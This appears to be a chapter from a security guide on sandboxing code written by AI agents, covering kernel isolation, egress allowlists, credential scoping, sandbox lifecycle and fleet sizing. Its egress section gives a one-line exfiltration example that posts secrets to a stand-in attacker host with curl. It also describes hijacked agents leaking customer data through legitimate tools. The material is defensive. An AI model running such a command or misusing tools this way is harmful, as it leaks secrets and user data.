The idea in one minute#
Capable agents write and run code. That code is produced by a model that may have just read an attacker’s instructions, so it must be treated as untrusted code and run where it cannot hurt anything: a sandbox. A sandbox is defined by three walls — what the code can execute against (kernel isolation), what it can reach (network egress) and what it can see (files and credentials). Agents also changed what a sandbox has to be: not a millisecond function, but a stateful workspace that lives for hours, mostly idle, and must start in well under a second.
A picture#
flowchart LR
AG[":i-bot: <b>Agent harness</b><br/><small>trusted, holds credentials</small>"] -->|"run this command"| CTL[":kubernetes: <b>Sandbox controller</b><br/><small>claim from warm pool</small>"]
CTL --> SB
subgraph SB["One sandbox per task"]
direction TB
WS[":i-terminal: <b>Shell + workspace</b><br/><small>model-written code runs here</small>"]
FS[(":i-hard-drive: <b>Scoped files</b><br/><small>this task's repo only</small>")]
WS --- FS
end
SB --> ISO[":gvisor: <b>Isolation boundary</b><br/><small>gVisor or microVM</small>"]
ISO --> HOST[":linux: <b>Host kernel</b>"]
SB -->|"all traffic"| EG[":envoyproxy: <b>Egress proxy</b><br/><small>allowlist, credential injection</small>"]
EG --> OK[":github: <b>Allowed hosts</b>"]
EG -.->|"blocked"| NO[":i-ban: <b>Everything else</b>"]
AG -.->|"no secrets cross"| SB
class AG compute
class CTL queue
class WS warn
class FS memory
class ISO,HOST neutral
class EG io
class OK neutral
class NO warnHow it really works#
Wall 1 — kernel isolation#
An ordinary container shares the host kernel; a kernel exploit escapes it. For untrusted code that is too thin. The options, weakest to strongest:
| Technology | Mechanism | Start time | Overhead | Use |
|---|---|---|---|---|
| Container (runc) | Namespaces, cgroups, seccomp | ~100 ms | Lowest | Trusted code only |
| gVisor | A user-space kernel intercepts system calls | ~100–200 ms | Some, on I/O-heavy work | Multi-tenant code execution with good density |
| MicroVM (Firecracker, Kata Containers, Cloud Hypervisor) | A real VM boundary with a minimal device model | ~125–300 ms; less from a snapshot | Memory per VM | Strongest isolation; hostile multi-tenancy |
| WebAssembly | A capability-based language VM | Milliseconds | Limited system access | Small, pure computations and plug-ins |
The rule: code written by a model on behalf of one tenant must be isolated from other tenants by at least a user-space kernel, and by a VM boundary when tenants are mutually hostile.
Wall 2 — network egress#
A sandbox with open internet access is an exfiltration tool: curl attacker.example -d @secrets.
Deny by default, then allow what the task needs:
- No egress for pure computation.
- An allowlist of hosts — package registries, the task’s own repository host — enforced by a proxy outside the sandbox.
- No access to cloud metadata endpoints or the internal network, ever.
- DNS goes through the proxy too; DNS queries are an exfiltration channel.
Egress control is the single most effective defence against data theft by a hijacked agent, because it holds even when every other control has failed.
Wall 3 — files and credentials#
- Mount only this task’s files. Not the home directory, not other tenants’ workspaces.
- No long-lived secrets inside the sandbox. When the code must call an authenticated API, the egress proxy injects the credential on the way out, so the code never holds it.
- Where a token must be inside, make it short-lived and scoped to the single resource the task needs — one repository, read-only if possible.
- The harness, which holds real credentials and talks to the model, runs outside.
The lifecycle agents need#
A serverless function lives for milliseconds. An agent’s sandbox is different:
create from a pre-built image or a memory snapshot target: < 300 ms
work commands arrive over minutes or hours; mostly idle between model calls
pause snapshot memory and disk; release CPU and RAM while waiting on a human
resume restore the snapshot; processes continue target: < 1 s
fork copy a snapshot to try two approaches in parallel
destroy wipe everything; nothing survives into another taskThree techniques make this affordable: warm pools of pre-started sandboxes claimed on demand, snapshots so that an idle sandbox costs storage rather than memory, and copy-on-write file systems so a 5 GB repository checkout is not copied per task.
On Kubernetes this is now a standard API. The Agent Sandbox project under SIG Apps
defines a Sandbox resource — a stateful, singleton, idle-heavy workload with a stable
identity — together with templates, claims and warm pools, and runs on gVisor or Kata
Containers. Managed versions exist on the major clouds, and specialised providers such as E2B,
Modal and Daytona sell the same capability as a service.
The sandbox is one layer, not the defence#
A sandbox contains what the code does. It does not constrain what the agent does through
its legitimate tools. An agent tricked into calling send_email with customer data has not
escaped anything. So the sandbox works together with:
- the policy layer that checks every tool call (Anatomy of an Agent),
- scoped identities for the agent (Identity and Authorization),
- and the architectural patterns of Architectural Defenses.
Other tools that need containment#
| Tool | Risk | Containment |
|---|---|---|
| Browser automation | Pages contain injections; sessions hold logins | A browser per task in a sandbox; no saved credentials; domain allowlist |
Local MCP servers (stdio) | Run with the user’s privileges | Launch inside a sandbox; pin versions |
| File tools | Path traversal, overwriting configuration | A workspace root that paths cannot escape; protected files |
| Database tools | Destructive or exfiltrating queries | Read-only role by default; row limits; statement allowlist |
| Shell | Everything | Sandbox, plus command policies for defence in depth |
Sizing a sandbox fleet#
concurrent agent tasks at peak 2,000
sandbox size 1 vCPU, 2 GB while active
share active at any moment ~15% (the rest wait on model calls or humans)
without pause: 2,000 × 2 GB = 4,000 GB of memory reserved
with pause: 300 × 2 GB + snapshots ≈ 600 GB + storage
warm pool: enough to cover the arrival rate × create time, e.g. 50 readySandboxes are CPU workloads and should run on their own node pool, separate from pods that hold credentials and from GPU nodes.
Remember this#
- Model-written code is untrusted code.
- Three walls: kernel isolation, egress control, scoped files and credentials.
- gVisor or a microVM for anything multi-tenant; never a plain container.
- Deny egress by default; inject credentials at the proxy.
- Agent sandboxes are stateful and idle-heavy: warm pools, snapshots, pause and resume.
- The sandbox contains code, not the agent’s use of legitimate tools.
Try it#
- For a coding agent, write the egress allowlist. What breaks if you forget the package
registry, and what is exposed if you allow
*? - Recompute the fleet sizing for 10,000 concurrent tasks at 10% active.
- An agent needs to push a branch to one repository. Describe the credential it uses: scope, lifetime, and where it is held.
Check yourself#
- Why is a plain container insufficient for model-written code in a multi-tenant system?
- Which wall still protects data after an agent has been fully hijacked?
- What does a sandbox not protect against?